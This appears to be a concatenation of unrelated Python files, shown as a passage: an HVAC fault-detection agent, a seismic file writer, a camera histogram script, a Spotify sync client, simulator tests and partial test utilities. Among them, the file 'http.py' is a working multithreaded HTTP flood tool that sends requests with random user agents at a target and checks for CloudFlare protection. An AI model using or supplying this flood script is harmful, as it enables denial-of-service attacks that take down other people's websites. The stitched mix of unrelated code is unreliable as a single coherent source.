# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
#}}}
import clock
import logging
import sys
import greenlet
from zmq.utils import jsonapi
from volttron.lite.agent import BaseAgent, PublishMixin, periodic
from volttron.lite.agent import green, utils, matching, sched
from volttron.lite.messaging import headers as headers_mod, topics
#Import all afdd algorithms
import afdd
import datetime
import uuid
#_log = logging.getLogger(__name__)
#logging.basicConfig(level=logging.DEBUG, stream=sys.stderr)
def AFDDAgent(config_path, **kwargs):
config = utils.load_config(config_path)
agent_id = config['agentid']
termination_window = config.get('termination_window', 600)
min_run_window = config.get('min_run_window', 3600 + termination_window)
rtu_path = dict((key, config[key])
for key in ['campus', 'building', 'unit'])
log_filename = config.get('file_name')
day_run_interval = config.get('day_run_interval')
start_hour = config.get('start_hour')
start_minute = config.get('start_minute')
volttron_flag = config.get('volttron_flag')
debug_flag = True
if not debug_flag:
_log = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG, stream=sys.stderr,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%m-%d-%y %H:%M:%S')
else:
_log = logging.getLogger(__name__)
logging.basicConfig(level=logging.NOTSET, stream=sys.stderr,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt= '%m-%d-%y %H:%M:%S',
filename=log_filename,
filemode='a+')
fmt_str = '%(asctime)s %(levelname)-8s %(message)s'
formatter = logging.Formatter(fmt_str,datefmt = '%m-%d-%y %H:%M:%S')
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
console.setFormatter(formatter)
logging.getLogger("").addHandler(console)
_log.debug(rtu_path)
class Agent(PublishMixin, BaseAgent):
def __init__(self, **kwargs):
super(Agent, self).__init__(**kwargs)
self.lock_timer = None
self.lock_acquired = False
self.tasklet = None
self.data_queue = green.WaitQueue(self.timer)
self.value_queue = green.WaitQueue(self.timer)
self.last_run_time = None
self.is_running = False
self.remaining_time = None
self.task_id=None
self.retry_schedule = None
self.start = None
self.end = None
def setup(self):
super(Agent, self).setup()
self.scheduled_task()
def startrun(self, algo=None):
if algo is None:
algo = afdd.AFDD(self,config_path).run
self.tasklet = greenlet.greenlet(algo)
self.is_running = True
self.last_run_time = datetime.datetime.now()
self.tasklet.switch()
def scheduled_task(self):
task_id = uuid.uuid4()
self.task_id=str(task_id)
headers = {
'type': 'NEW_SCHEDULE',
'requesterID': agent_id,
'taskID': self.task_id,
'priority': 'LOW_PREEMPT'
}
if datetime.datetime.now().hour > start_hour:
self.start = datetime.datetime.now().replace(hour=start_hour, minute=start_minute)
self.start = self.start + datetime.timedelta(days=1)
self.end = self.start + datetime.timedelta(hours=2,minutes=30)
sched_time = datetime.datetime.now() + datetime.timedelta(days=day_run_interval + 1)
sched_time=sched_time.replace(hour=0,minute=1)
else:
self.start = datetime.datetime.now().replace(hour=start_hour, minute=start_minute)
self.end = self.start + datetime.timedelta(hours=2,minutes=30)
sched_time = datetime.datetime.now() + datetime.timedelta(days=day_run_interval)
self.start = str(self.start)
self.end = str(self.end)
self.task_timer = self.periodic_timer(60, self.publish_json,
topics.ACTUATOR_SCHEDULE_REQUEST(), headers,[["{campus}/{building}/{unit}".format(**rtu_path),self.start,self.end]])
self.next = self.schedule(sched_time, self.scheduled_task)
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id,'type': 'CANCEL_SCHEDULE'})
@matching.match_exact(topics.ACTUATOR_SCHEDULE_RESULT())
def preempt(self):
if self.is_running:
self.cancel_greenlet()
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_exact(topics.ACTUATOR_SCHEDULE_ANNOUNCE(**rtu_path))
def on_schedule(self, topic, headers, message, match):
msg = jsonapi.loads(message[0])
now = datetime.datetime.now()
print 'announce received'
self.remaining_time = headers.get('window', 0)
if self.task_id == headers.get('taskID', ''):
if self.remaining_time < termination_window:
if self.is_running:
self.cancel_greenlet()
elif (self.remaining_time > min_run_window and
(self.last_run_time is None or
(now - self.last_run_time) > datetime.timedelta(hours=23, minutes=50))):
self.startrun()
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_exact(topics.ACTUATOR_SCHEDULE_RESULT())
def schedule_result(self, topic, headers, message, match):
msg = jsonapi.loads(message[0])
print 'response received'
self.task_timer.cancel()
# @matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
# @matching.match_exact(topics._ACTUATOR_SCHEDULE(**rtu_path))
#
# @matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
# @matching.match_exact(topics.ACTUATOR_LOCK_RESULT(**rtu_path))
# def on_lock_result(self, topic, headers, message, match):
# msg = jsonapi.loads(message[0])
# holding_lock = self.lock_acquired
# self.lock_acquired = msg == 'SUCCESS'
# if self.lock_acquired and not holding_lock and not self.is_running:
# self.start()
@matching.match_exact(topics.RTU_VALUE(point='all', **rtu_path))
def on_new_data(self, topic, headers, message, match):
data = jsonapi.loads(message[0])
#Check override status
if int(data["VoltronPBStatus"]) == 1:
if self.is_running:
_log.debug("AFDD is overridden...")
headers = {
'Content-Type': 'text/plain',
'requesterID': agent_id,
}
self.publish(topics.ACTUATOR_SET(point="VoltronFlag", **rtu_path),
headers, str(0.0))
self.cancel_greenlet()
else:
self.data_queue.notify_all(data)
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_glob(topics.ACTUATOR_VALUE(point='*', **rtu_path))
def on_set_result(self, topic, headers, message, match):
self.value_queue.notify_all((match.group(1), True))
@matching.match_headers({headers_mod.REQUESTER_ID: agent_id})
@matching.match_glob(topics.ACTUATOR_ERROR(point='*', **rtu_path))
def on_set_error(self, topic, headers, message, match):
self.value_queue.notify_all((match.group(1), False))
def cancel_greenlet(self):
#kill all tasks currently in the queue
self.data_queue.kill_all()
self.value_queue.kill_all()
#kill current tasklet
self.tasklet.throw()
self.is_running = False
def sleep(self, timeout):
_log.debug('wait for steady state({})'.format(timeout))
green.sleep(timeout, self.timer)
def get_new_data(self, timeout=None):
_log.debug('get_new_data({})'.format(timeout))
return self.data_queue.wait(timeout)
def command_equip(self, point_name, value, timeout=None):
_log.debug('set_point({}, {}, {})'.format(point_name, value, timeout))
headers = {
'Content-Type': 'text/plain',
'requesterID': agent_id,
}
self.publish(topics.ACTUATOR_SET(point=point_name, **rtu_path),
headers, str(value))
try:
return self.value_queue.wait(timeout)
except green.Timeout:
return True
Agent.__name__ = 'AFDDAgent'
return Agent(**kwargs)
def main(argv=sys.argv):
'''Main method called by the eggsecutable.'''
utils.default_main(AFDDAgent,
description='VOLTTRON Lite™ AFDD agent',
argv=argv)
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
# def setup(self):
# super(Agent, self).setup()
# headers = {
# 'Content-Type': 'text/plain',
# 'requesterID': agent_id,
# }
# self.lock_timer = self.periodic_timer(2, self.publish,
# topics.ACTUATOR_LOCK_ACQUIRE(**rtu_path), headers)
#Testing functions
# def test():
# import threading, time
# from volttron.lite.agent import periodic
#
# def TestAgent(config_path, condition, **kwargs):
# config = utils.load_config(config_path)
# agent_id = config['agentid']
# rtu_path = dict((key, config[key])
# for key in ['campus', 'building', 'unit'])
#
# class Agent(PublishMixin, BaseAgent):
# def __init__(self, **kwargs):
# super(Agent, self).__init__(**kwargs)
#
# def setup(self):
# super(Agent, self).setup()
# self.damper = 0
# with condition:
# condition.notify()
#
# @matching.match_regex(topics.ACTUATOR_LOCK_ACQUIRE() + '(/.*)')
# def on_lock_result(self, topic, headers, message, match):
# _log.debug("Topic: {topic}, {headers}, Message: {message}".format(
# topic=topic, headers=headers, message=message))
# self.publish(topics.ACTUATOR_LOCK_RESULT() + match.group(0),
# headers, jsonapi.dumps('SUCCESS'))
#
# @matching.match_regex(topics.ACTUATOR_SET() + '(/.*/([^/]+))')
# def on_new_data(self, topic, headers, message, match):
# _log.debug("Topic: {topic}, {headers}, Message: {message}".format(
# topic=topic, headers=headers, message=message))
# if match.group(2) == 'Damper':
# self.damper = int(message[0])
# self.publish(topics.ACTUATOR_VALUE() + match.group(0),
# headers, message[0])
#
# # @periodic(5)
# def send_data(self):
# data = {
# 'ReturnAirTemperature': 78,
# 'OutsideAirTemperature': 71,
# 'DischargeAirTemperature': 76,
# 'MixedAirTemperature': 72,
# 'DamperSignal': 0,
# 'CoolCommand1': 0,
# 'CoolCommand2':0,
# 'OutsideAirVirtualPoint': 75-10,
# 'CoolCall1':1,
# 'HeatCommand1':0,
# 'HeatCommand2':0,
# 'SupplyFanSpeed':75,
# 'ReturnAirCO2Stpt': 65,
# 'FanStatus': 1
# }
# self.publish_ex(topics.RTU_VALUE(point='all', **rtu_path),
# {}, ('application/json', jsonapi.dumps(data)))
#
# Agent.__name__ = 'TestAgent'
# return Agent(**kwargs)
#
# #settings.afdd2_seconds_to_steady_state = 3
# #settings.sync_trial_time = 10
# condition = threading.Condition()
# t = threading.Thread(target=utils.default_main, args=(TestAgent, 'test'),
# kwargs={'condition': condition})
# t.daemon = True
# t.start()
# with condition:
# condition.wait()
# main()
|
http.py
|
#!/usr/bin/env python3
import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
print("\033[1;33m"+"[!]"+"\033[0m"+" This site is under CloudFlare protection.")
if input("\033[1;77m"+"[?]"+"\033[0m"+" Continue HTTP attack? (y/n): ").strip(" ").lower() != "y":
exit()
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting HTTP attack...")
threads_list = []
# Load 25 random user agents
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" HTTP packet with size " + str(len(payload)) + " was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
streamToSeedFile.py
|
#from verce.processing import *
from scipy.cluster.vq import whiten
import socket
import traceback
from multiprocessing import Process, Queue, Pipe
class StreamToSeedFile(SeismoPreprocessingActivity):
def writeToFile(self,stream,location):
stream.write(location,format='MSEED',encoding='FLOAT32');
__file = open(location)
return os.path.abspath(__file.name)
def compute(self):
#folder=str(self.streams[0][0]);
#tokenz=folder.split('|')
#folder=tokenz[1];
#tokenz=folder.split(' - ');
#folder=tokenz[0]+" - "+tokenz[1];
self.outputdest=self.outputdest+"%s" % (self.parameters["filedestination"],);
for tr in self.streams[0]:
try:
tr.data=tr.data.filled();
except Exception, err:
tr.data=np.float32(tr.data);
name=str(self.streams[0][0].stats.network) + "." + self.streams[0][0].stats.station + "." + self.streams[0][0].stats.channel
try:
if tr.stats['type']=="velocity":
self.outfile= str(name)+".seedv"
else:
if tr.stats['type']=="acceleration":
self.outfile= str(name)+".seeda"
else:
if tr.stats['type']=="displacement":
self.outfile= str(name)+".seedd"
else:
self.outfile= str(name)+".seed"
except Exception, err:
self.outfile= str(name)+".seed"
#self.outputdest=self.outputdest+"/"+folder
try:
if not os.path.exists(self.outputdest):
os.makedirs(self.outputdest)
except Exception, e:
print "folder exists: "+self.outputdest
self.outputdest=self.outputdest+"/"+self.outfile
#stores the file in a folder created on the date of the first trace
# p = multiprocessing.Process(target=self.writeToFile, args=(self.streams[0],self.outputdest))
path=self.writeToFile(self.streams[0],self.outputdest)
# p.start()
# p.join(10)
self.addOutput(self.streams[0],location="file://"+socket.gethostname()+path,format="application/octet-stream",metadata={'prov:type':'synthetic-waveform'})
return "true"
if __name__ == "__main__":
proc=StreamToSeedFile("StreamToSeedFile Script")
proc.process();
|
cam_processing.py
|
#!/usr/bin/python3
import cv2
import numpy as np
import matplotlib.pyplot as plt
import threading
import retinex
from ubi_test import post_request
print("Versión de OpenCV:",cv2.__version__)
global cap, frame
cap = cv2.VideoCapture(-1)
frame = np.array([])
def quitar_ruido(img):
# Create our sharpening kernel, the sum of all values must equal to one for uniformity
kernel_sharpening = np.array([[-1,-1,-1],
[-1, 9,-1],
[-1,-1,-1]])
sharpened_img = cv2.filter2D(img, -1, kernel_sharpening)
return sharpened_img
def procesar_video():
global cap, frame
while True:
# Capture frame-by-frame
ret, frame = cap.read()
# PROCESAMIENTO DE LA IMAGEN (frame)
imagen_filtrada = quitar_ruido(frame)
# bordes = cv2.Canny(imagen_filtrada, 100,200)
# Display the resulting frame
cv2.imshow('ImagenEstanque', imagen_filtrada)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
def inicializar_hist():
color = 'gray'
bins = 16
resizeWidth = 0
# Initialize plot.
fig, ax = plt.subplots()
if color == 'rgb':
ax.set_title('Histogram (RGB)')
else:
ax.set_title('Histogram (grayscale)')
ax.set_xlabel('Bin')
ax.set_ylabel('Frequency')
# Initialize plot line object(s). Turn on interactive plotting and show plot.
lw = 3
alpha = 0.5
if color == 'rgb':
lineR, = ax.plot(np.arange(bins), np.zeros((bins,)), c='r', lw=lw, alpha=alpha)
lineG, = ax.plot(np.arange(bins), np.zeros((bins,)), c='g', lw=lw, alpha=alpha)
lineB, = ax.plot(np.arange(bins), np.zeros((bins,)), c='b', lw=lw, alpha=alpha)
else:
lineGray, = ax.plot(np.arange(bins), np.zeros((bins,1)), c='k', lw=lw)
ax.set_xlim(0, bins-1)
ax.set_ylim(0, 1)
plt.ion()
plt.show()
# Grab, process, and display video frames. Update plot line object(s).
while True:
(grabbed, frame) = cap.read()
if not grabbed:
break
# Resize frame to width, if specified.
if resizeWidth > 0:
(height, width) = frame.shape[:2]
resizeHeight = int(float(resizeWidth / width) * height)
frame = cv2.resize(frame, (resizeWidth, resizeHeight),
interpolation=cv2.INTER_AREA)
# Normalize histograms based on number of pixels per frame.
numPixels = np.prod(frame.shape[:2])
if color == 'rgb':
cv2.imshow('Imagen Estanque', frame)
(b, g, r) = cv2.split(frame)
histogramR = cv2.calcHist([r], [0], None, [bins], [0, 255]) / numPixels
histogramG = cv2.calcHist([g], [0], None, [bins], [0, 255]) / numPixels
histogramB = cv2.calcHist([b], [0], None, [bins], [0, 255]) / numPixels
lineR.set_ydata(histogramR)
lineG.set_ydata(histogramG)
lineB.set_ydata(histogramB)
else:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('Org', frame)
# RETINEX: descomentar para mostrar cómo queda la imagen luego de aplicar retinex
# img_amsrcr = retinex.automatedMSRCR(frame,[15, 80, 250])
# cv2.imshow('AMSRCR', img_amsrcr)
histogram = cv2.calcHist([gray], [0], None, [bins], [0, 255]) / numPixels
lineGray.set_ydata(histogram)
# Calculo la media del histograma
hist_mean = np.mean(histogram)
# Creo un diccionario para publicarlo en Ubidots
dict_data = {"histogram_mean": hist_mean}
# Acá se publica en Ubidots
# post_request(dict_data)
fig.canvas.draw()
# PROCESAMIENTO DE LA IMAGEN (frame)
# bordes = cv2.Canny(frame, 100,200)
# Display the resulting frame
# cv2.imshow('Bordes Imagen', bordes)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
hist_process = threading.Thread(target = inicializar_hist)
hist_process.start()
|
radiosync.py
|
from concurrent import futures
import json as json_lib
import logging
import requests
import threading
import time
import urllib
import urlparse
WINDOW = 5.0
SCHEME = "https"
HOST = "radio-sync.appspot.com"
def log():
return logging.getLogger(__name__)
class AgedStatus(object):
def __init__(self, status, age=None):
self.status = status
self.base_age = age
self.created = time.time()
@property
def age(self):
return time.time() - self.created + (self.base_age or 0)
@property
def pos(self):
return self.get("playing_position")
@property
def track(self):
return self.get("track")
@property
def track_uri(self):
track = self.track
return track["track_resource"]["uri"] if track else None
@property
def track_length(self):
track = self.track
return track.get("length") if track else None
@property
def overtime(self):
if self.track_length is None or self.pos is None:
return 0
return self.pos - self.track_length
@property
def running(self):
return self.get("running")
@property
def playing(self):
return self.get("playing")
@property
def stale(self):
return not self.running or self.overtime > 0
def __getitem__(self, key):
if key not in self.status:
raise KeyError(key)
return self.get(key)
def get(self, key, default=None):
if key not in self.status:
return default
if key == "playing_position":
position = self.status["playing_position"]
if self.get("playing"):
return position + self.age
else:
return position
if key == "server_time":
return self.status["server_time"] + int(self.age)
else:
return self.status.get(key, default)
class Broadcast(object):
SCHEME = SCHEME
HOST = HOST
PATH = "playerstate"
def __init__(self, id, spotify):
self.id = id
self.spotify = spotify
self.thread = None
self.running = False
def start(self):
if self.running:
return
log().debug("Signaling start.")
self.running = True
self.thread = threading.Thread(
name="Broadcast-%s" % self.id, target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
log().debug("Signaling stop.")
self.running = False
self.thread = None
def run(self):
log().debug("Starting.")
while self.running:
try:
for status in self.spotify.remote_status_shortlong(
returnafter=1800, returnon=self.spotify.EVENTS):
if not self.running:
break
status = json_lib.dumps(status)
url = urlparse.urlunparse((
self.SCHEME, self.HOST, self.PATH, None, None, None))
requests.post(url, data=dict(id=self.id, status=status))
except Exception:
log().exception("While posting update")
log().debug("Stopping.")
class LocalStatusGetter(object):
def __init__(self, spotify, cv, **kwargs):
self.spotify = spotify
self.cv = cv
self.kwargs = kwargs
self.status = None
self.thread = None
self.running = False
def start(self):
self.running = True
self.thread = threading.Thread(
name="LocalStatusGetter", target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
def run(self):
log().debug("Starting.")
while self.running:
for status in self.spotify.remote_status_shortlong(**self.kwargs):
status = AgedStatus(status)
log().debug("Got local status.")
with self.cv:
self.status = status
self.cv.notify()
log().debug("Stopping.")
class TargetStatusGetter(object):
PATH = "playerstate"
def __init__(self, cv, target_id, window=None, rapid_poll_interval=None,
target_timeout=None):
self.cv = cv
self.target_id = target_id
self.window = window or 0
self.rapid_poll_interval = rapid_poll_interval or 0
self.target_timeout = target_timeout
self.status = None
self.thread = None
self.running = False
def start(self):
self.running = True
self.thread = threading.Thread(
name="TargetStatusGetter", target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
def get_target_status(self):
log().debug("Getting target status.")
query = urllib.urlencode(dict(id=self.target_id))
url = urlparse.urlunparse((
SCHEME, HOST, self.PATH, None, query, None))
json = requests.get(url).json()
if json and json["status"]:
return AgedStatus(json["status"], age=json["age"])
log().debug("No status for target.")
return AgedStatus({"running": False})
def run(self):
log().debug("Starting.")
status = self.get_target_status()
with self.cv:
self.status = status
self.cv.notify()
while self.running:
# Poor man's long-polling. Poll slowly, but speed up around track
# changes, to catch changes with less delay. Hopefully goes away
# when we change out the backend...
with self.cv:
if not self.status.playing:
log().debug("Target not playing.")
wait_time = self.window
elif self.status.overtime > self.target_timeout:
log().debug("Target looks timed out.")
wait_time = self.window
elif self.status.overtime > 0:
log().debug("Target is overtime.")
wait_time = self.rapid_poll_interval
elif self.status.overtime > -self.window:
log().debug("Target coming up on overtime.")
wait_time = (
-self.status.overtime + self.rapid_poll_interval)
else:
wait_time = self.window
log().debug("Waiting %.3fs before polling.", wait_time)
time.sleep(wait_time)
if not self.running:
break
status = self.get_target_status()
with self.cv:
self.status = status
self.cv.notify()
log().debug("Stopping.")
class Follow(object):
SCHEME = SCHEME
HOST = HOST
PATH = "playerstate"
TARGET_TIMEOUT = 10.0
WINDOW = 5.0
RAPID_POLL_INTERVAL = 0.5
def __init__(self, spotify, target_id):
self.spotify = spotify
self.target_id = target_id
self.last_local_status = None
self.local_status = None
self.target_status = None
self.thread = None
self.running = False
def start(self):
log().debug("Signaling start.")
self.running = True
self.thread = threading.Thread(
name="Follow-%s" % self.target_id, target=self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
log().debug("Signaling stop.")
self.running = False
self.thread = None
def is_synced(self):
"""Decide if we should catch up to the target."""
if bool(self.target_status) != bool(self.local_status):
return False
if not self.local_status:
return True
if self.target_status.running != self.local_status.running:
log().debug(
"Local %srunning, target %srunning",
"" if self.local_status.running else "not ",
"" if self.target_status.running else "not ")
return False
target_playing = (
self.target_status.playing and self.target_status.overtime < 0)
if target_playing != self.local_status.playing:
log().debug(
"Local %splaying, target %splaying",
"" if self.local_status.playing else "not ",
"" if target_playing else "not ")
return False
if not self.local_status.playing:
return True
if self.target_status.track_uri != self.local_status.track_uri:
# We have a next-track for the target, and we just switched tracks
# (probably automatically went to the next track). It's okay to
# switch tracks.
if self.local_status.pos < 0.1:
log().debug("We just switched tracks, catching up.")
return False
# If we're just finishing up a track, let it finish, before
# switching to the target's next track.
delta = (
self.local_status.track_length - self.local_status.pos +
self.target_status.pos)
log().debug("Target on different track, delta = %.3f", delta)
if delta > self.WINDOW:
return False
else:
# Seek to the right position if we're too far off.
delta = self.target_status.pos - self.local_status.pos
log().debug("Delta = %.3f", delta)
if abs(delta) > self.WINDOW:
return False
return True
def try_update_status(self, update_func):
start = time.time()
status = update_func()
elapsed = time.time() - start
log().debug("New status: %s", json_lib.dumps(status))
status = AgedStatus(status, age=elapsed / 2)
if not status.get("error"):
self.last_local_status = None
self.local_status = status
return True
else:
return False
def do_update(self, update_func):
if not self.try_update_status(update_func):
self.try_update_status(lambda: self.spotify.remote_status())
def sync(self):
playing = self.target_status.playing
if self.target_status.overtime > 0:
log().debug("Target is overtime.")
playing = False
if not playing:
modified = self.local_status and self.local_status.playing
if modified:
log().debug("Pausing.")
self.do_update(lambda: self.spotify.remote_pause(True))
return True
else:
log().debug("Continuing to do nothing.")
return False
target_pos = self.target_status.pos
# Smoother transitions.
# TODO: Web Helper connections seem to always take several seconds, we
# often have to seek after a track change. Maybe subtract some time
# here.
if target_pos < self.WINDOW:
target_pos = 0
target_uri = "%s#%d:%.3f" % (
self.target_status.track_uri, int(target_pos / 60),
target_pos % 60)
log().debug("Syncing to %s", target_uri)
self.do_update(lambda: self.spotify.remote_play(target_uri))
return True
def maybe_sync(self):
if not self.target_status or not self.local_status:
return False
if self.is_synced():
return False
else:
self.sync()
return True
"""
elif self.local_status_is_user_stop_action():
log().debug("User wants to take control.")
self.stop()
return
"""
def run(self):
log().debug("Starting.")
cv = threading.Condition()
self.local_status = None
self.target_status = None
target_getter = None
local_getter = None
try:
with cv:
while self.running:
try:
if not local_getter:
local_getter = LocalStatusGetter(
self.spotify, cv, returnon=self.spotify.EVENTS,
returnafter=3600)
local_getter.start()
if not target_getter:
target_getter = TargetStatusGetter(
cv, self.target_id, window=self.WINDOW,
rapid_poll_interval=self.RAPID_POLL_INTERVAL,
target_timeout=self.TARGET_TIMEOUT)
target_getter.start()
if local_getter.status:
self.local_status = local_getter.status
if target_getter.status:
self.target_status = target_getter.status
if self.maybe_sync():
# If we made any status changes, any old long-polls
# might return outdated data. Ignore them and start
# new polls.
log().debug("Changed local status, resetting getter.")
local_getter.stop()
local_getter = None
else:
log().debug("Waiting for changes.")
cv.wait()
except:
log().exception("While following, resetting.")
if local_getter:
local_getter.stop()
local_getter = None
if target_getter:
target_getter.stop()
target_getter = None
finally:
if local_getter:
local_getter.stop()
if target_getter:
target_getter.stop()
log().debug("Stopping.")
|
test_simulator.py
|
import multiprocessing
import random
import numpy as np
import examples.settings
import habitat_sim
def test_no_navmesh_smoke():
sim_cfg = habitat_sim.SimulatorConfiguration()
agent_config = habitat_sim.AgentConfiguration()
# No sensors as we are only testing to see if things work
# with no navmesh and the navmesh isn't used for any exisitng sensors
agent_config.sensor_specifications = []
sim_cfg.scene.id = "data/scene_datasets/habitat-test-scenes/van-gogh-room.glb"
# Make it try to load a navmesh that doesn't exists
sim_cfg.scene.filepaths["navmesh"] = "/tmp/dne.navmesh"
sim = habitat_sim.Simulator(habitat_sim.Configuration(sim_cfg, [agent_config]))
sim.initialize_agent(0)
random.seed(0)
for _ in range(50):
obs = sim.step(random.choice(list(agent_config.action_space.keys())))
# Can't collide with no navmesh
assert not obs["collided"]
def test_empty_scene(sim):
cfg_settings = examples.settings.default_sim_settings.copy()
# keyword "NONE" initializes a scene with no scene mesh
cfg_settings["scene"] = "NONE"
# test that depth sensor doesn't mind an empty scene
cfg_settings["depth_sensor"] = True
hab_cfg = examples.settings.make_cfg(cfg_settings)
sim.reconfigure(hab_cfg)
# test that empty frames can be rendered without a scene mesh
for _ in range(2):
obs = sim.step(random.choice(list(hab_cfg.agents[0].action_space.keys())))
def test_sim_reset(sim):
agent_config = sim.config.agents[0]
sim.initialize_agent(0)
initial_state = sim.agents[0].initial_state
# Take random steps in the environment
for _ in range(10):
action = random.choice(list(agent_config.action_space.keys()))
obs = sim.step(action)
sim.reset()
new_state = sim.agents[0].get_state()
same_position = all(initial_state.position == new_state.position)
same_rotation = np.isclose(
initial_state.rotation, new_state.rotation, rtol=1e-4
) # Numerical error can cause slight deviations
assert same_position and same_rotation
def _test_keep_agent_tgt():
sim_cfg = habitat_sim.SimulatorConfiguration()
agent_config = habitat_sim.AgentConfiguration()
sim_cfg.scene.id = "data/scene_datasets/habitat-test-scenes/van-gogh-room.glb"
agents = []
for _ in range(3):
sim = habitat_sim.Simulator(habitat_sim.Configuration(sim_cfg, [agent_config]))
agents.append(sim.get_agent(0))
sim.close()
# Make sure you can keep a reference to an agent alive without crashing
def test_keep_agent():
mp_ctx = multiprocessing.get_context("spawn")
# Run this test in a subprocess as things with OpenGL
# contexts get messy
p = mp_ctx.Process(target=_test_keep_agent_tgt)
p.start()
p.join()
assert p.exitcode == 0
|
utils.py
|
import copy
import json
import os
import pipes
import re
import shutil
import subprocess
import sys
import tempfile
import time
from datetime import timedelta
import infinit.beyond
import infinit.beyond.bottle
import infinit.beyond.couchdb
from common import *
binary = 'memo'
cr = '\r\n' if os.environ.get('EXE_EXT') else '\n'
windows = os.environ.get('OS') == 'windows' # Set in the drakefile.
def prefix_lines(prefix, s):
return re.sub('^', prefix, s, flags = re.M)
# FIXME: Duplicate with drake.
class TemporaryDirectory:
def __init__(self, path = None):
self.__dir = path
self.__del = False
def __enter__(self):
if self.__dir is None:
self.__dir = tempfile.mkdtemp()
self.__del = True
return self
def __exit__(self, *args, **kwargs):
if self.__del:
shutil.rmtree(self.__dir)
def __str__(self):
return str(self.__dir)
@property
def dir(self):
return self.__dir
class Memo(TemporaryDirectory):
def __init__(self,
beyond = None,
memo_root = None,
home = None,
user = None):
super().__init__(home)
self.__beyond = beyond
self.__memo_root = memo_root or ''
self.__user = user
self.__env = {}
def __enter__(self):
super().__enter__()
return self
@property
def version(self):
return self.run(['memo', '--version'])[0]
@property
def user(self):
return self.__user
@property
def env(self):
return self.__env
@property
def data_home(self):
return '%s/.local/share/infinit/memo' % self.dir
@property
def state_path(self):
return '%s/.local/state/infinit/memo' % self.dir
@property
def silos_path(self):
return '%s/silos' % self.data_home
@property
def networks_path(self):
return '%s/networks' % self.data_home
@property
def linked_networks_path(self):
return '%s/linked_networks' % self.data_home
@property
def passports_path(self):
return '%s/passports' % self.data_home
@property
def volumes_path(self):
return '%s/volumes' % self.data_home
@property
def drives_path(self):
return '%s/drives' % self.data_home
def spawn(self,
args,
input = None,
return_code = 0,
env = {},
noscript = False,
gdb = False,
valgrind = False,
binary = binary):
if isinstance(args, str):
args = args.split(' ')
if args[0][0] != '/':
if '/' not in args[0]:
args[0] = 'bin/%s' % args[0]
build_dir = os.environ.get('BUILD_DIR')
if build_dir:
args[0] = '%s/%s' % (build_dir, args[0])
args[0] += os.environ.get('EXE_EXT', '')
if gdb:
args = ['/usr/bin/gdb', '--args'] + args + ['-s']
if input is not None:
log('GDB input: %s' % json.dumps(input))
input = None
elif valgrind:
args = ['/usr/bin/valgrind'] + args
env_ = {
'MEMO_BACKTRACE': '1',
'MEMO_RDV': '',
}
if self.dir is not None:
env_['MEMO_HOME'] = self.dir
if self.__user is not None:
env_['MEMO_USER'] = self.__user
if windows:
env_['WINEDEBUG'] = os.environ.get('WINEDEBUG', '-all')
for k in ['ELLE_LOG_LEVEL', 'ELLE_LOG_FILE', 'ELLE_LOG_TIME',
'MEMO_CACHE_HOME']:
if k in os.environ:
env_[k] = os.environ[k]
if self.__beyond is not None:
env_['MEMO_BEYOND'] = self.__beyond.domain
env_.update(env)
env_.update(self.__env)
if input is not None and not noscript:
args.append('-s')
pretty = '%s %s' % (
' '.join('%s=%s' % (k, v) for k, v in sorted(env_.items())),
' '.join(pipes.quote(arg) for arg in args))
if input is not None:
if isinstance(input, list):
input = '\n'.join(map(json.dumps, input)) + cr
elif isinstance(input, dict):
input = json.dumps(input) + cr
pretty = 'echo %s | %s' % (
pipes.quote(input.strip()), pretty)
input = input.encode('utf-8')
log(pretty)
